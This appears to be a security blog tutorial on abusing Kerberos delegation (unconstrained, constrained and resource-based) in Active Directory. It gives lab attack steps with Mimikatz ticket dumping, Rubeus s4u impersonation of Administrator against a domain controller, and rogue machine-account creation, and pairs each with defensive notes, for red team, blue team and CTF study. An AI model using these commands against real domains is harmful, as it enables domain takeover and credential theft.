Exploiting Kerberos Delegation in Active Directory in 2025

Why Kerberos Delegation Matters

Kerberos Delegation is a legitimate feature used to let services act on behalf of users. In a secure environment, it’s helpful, but in real-world AD setups?

It’s often misconfigured, and when it is, it becomes one of the fastest routes to total domain pwnage.

Today, I dissect all three forms of delegation:

• Unconstrained

• Constrained

• Resource-Based Constrained Delegation (RBCD)

Unconstrained Delegation: The Original Misconfiguration

What It Is

• Allows a computer/service to impersonate any user that authenticates to it.

• Stored in the userAccountControl flag (0x1000000).

• Targets: Computers, service accounts, even print servers

Attack Surface

• If you compromise an unconstrained delegation machine and a Domain Admin logs in

• You can extract the rTGT from memory (yes, even with ticket encryption).

Lab Attack Steps

1. Find Targets:

Get-ADComputer -Filter {TrustedForDelegation -eq $true}

2. Compromise the host (e.g., SMB relay, RCE)

3. Dump tickets:

Invoke-Mimikatz -Command 'sekurlsa::tickets /export'

4. Reuse DA’s TGT for lateral movement:

kerberos::ptt <DA-TGT>

Blue Team Notes

• Logon to unconstrained machines only with low-privilege accounts

• Detect with event ID 4769 + TGT reuse for the same host.

Constrained Delegation: The Middle Child

What It Is

• More restrictive delegation, only to specific services (e.g., HTTP/webapp01)

• Uses msDS-AllowedToDelegateTo attribute

Abuse Vector

If the attacker controls a user/machine allowed to delegate to cifs/dc01 They can:

• Perform s4u2self to impersonate any user

• Perform s4u2proxy to get service tickets to cifs/dc01

Lab Attack Steps (using Rebeus):

1. Get TGT for delegating account:

Rubeus asktgt /user:svc_deleg /rc4:<hash>

2. Impersonate the target User:

Rubeus s4u /user:svc_deleg /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/dc01 /ptt

3. Access target (e.g., DC admin share):

dir \\dc01\c$

Rubeus s4u2proxy ticket output

Blue Team Notes:

• Audit accounts with AllowedToDelegateTo set

• Use Set-ADAccountControlto disable delegation unless needed

• Monitor 4769 Port (TGS requests) to sensitive services

RBCD: Resource-Based Constrained Delegation

What It Is

• Modern delegation model where target service defins who can delegate to it

• Uses msDS-AllowedToActOnBehalfOfOtherIdentity attribute

Common Misconfig:

• Machines with excessive permissions can write that attribute to other machines

• Often abused post-compromise

Lab Attack (Add Computer + Abuse RBCD)

1. Create rogue computer (if MAQ > 0):

New-MachineAccount.ps1 -MachineName "WINPWN"

2. Configure RBCD on DC or target system:

Set-ADComputer "dc01" -PrincipalsAllowedToDelegateToAccount (Get-ADComputer "WINPWN").DistinguishedName

3. Use Rubeus to impersonate DA:

Rubeus s4u /user:WINPWN$ /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/dc01 /ptt

4. Profit:

dir \\dc01\c$

Blue Team Notes:

• Restrict MAQ (MachineAccountQuota) to 0

• Monitor RBCD ACL changes via LDAP audit logs

• Protect Tier 0 assets with gMSA and no delegation

Real World Labs to Practice Delegation Abuse

These labs mimic the same conditions found in real enterprise environments, which is perfect for CTF prep, red team simulation, or practicing

Unconstrained Delegation

• TryHackMe → “Attacking Kerberos”

Attacking KerberosTryHackMe

• Hack The Box → “Forest”

Hack The Boxapp.hackthebox.com

Constrained Delegation

• TryHackMe → “Wreath” (Red Team Path)

WreathTryHackMe

• Hack The Box → “Escape”

Hack The Boxapp.hackthebox.com

RBCD (Resource-Based Constrained Delegation)

• TryHackMe → “Ignite”

IgniteTryHackMe

• Hack The Box Pro Labs → “Enterprise” or “Cybernetics”

Hack The Boxapp.hackthebox.com

Real-world red teams often combine delegation attacks with:

• Printer Bug (SpoolSample)

• ADCS (ESC1 + delegration abuse)

• GPO-based lateral movement

Scenario: Exploit unconstrained server → dump DA TGT → plant RBCD → create shadow admin → DCSync

Defense in Layers

Conclusion

Delegation isn’t just an admin feature. It’s a privilege escalation highway paved by legacy configs and lazy permissions.

If you’re in the red team, map it. If you’re blue team, restrict it. If you’re a student, learn it before it burns you in a CTF.

Because if you see unconstrained delegation in 2025. You’re already owned. You just don’t know it yet.